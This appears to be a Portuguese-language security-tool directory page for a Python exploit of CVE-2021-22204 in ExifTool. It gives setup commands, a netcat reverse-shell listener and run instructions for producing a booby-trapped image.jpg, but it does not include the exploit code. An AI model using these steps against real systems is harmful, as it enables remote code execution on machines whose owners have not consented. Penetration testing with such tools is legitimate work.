Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/mr-tuhin/cve-2021-22204-exiftool
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubmr-tuhin/cve-2021-22204-exiftool

CVE-2021-22204-exiftool

Exploit em Python para CVE-2021-22204 no ExifTool, gerando uma imagem maliciosa que aciona um reverse shell quando processada por versões vulneráveis.

Ver Repositório
9223há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-22204-exiftool

Exploit em Python para a vulnerabilidade CVE-2021-22204 no Exiftool.

Tutorial em vídeo

Youtube

    404 não encontrado

Requisitos

python3 python3-pip djvulibre-bin exiftool

Instalar requisitos

Debian

    apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip

Ubuntu

    apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip

Arch Linux

    pacman -S djvulibre libimage-exiftool-perl python python-pip

Kali Linux

    apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip

Fedora

    dnf install djvulibre libimage-exiftool-perl python-minimal python-pip

OS X

    brew install djvulibre exiftool python

Raspbian

    apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip

Como executar:

Instalar requisitos do python

    sudo pip install -r requirements.txt

iniciar reverse shell com netcat

    nc -nvlp 4444

Dar permissão de execução

    chmod +x exploit.py

Executar o programa

    python3 exploit.py {Seu endereço IP} {Sua porta de escuta} 
    

OU

    ./exploit.py {Seu endereço IP} {Sua porta de escuta}

Exemplo

    python3 exploit.py 192.168.0.1 4444
    

OU

    ./exploit.py 192.168.0.1 4444

O nome do arquivo de saída é

    image.jpg
    

Sobre a vulnerabilidade

A CVE-2021-22204 foi descoberta e reportada por William Bowling. (@wcbowling)

Este exploit foi criado estudando o patch do exiftool após a CVE já ter sido reportada.

E o image.jpg acionará a vulnerabilidade quando aberto com um exiftool vulnerável.

Baixar ferramenta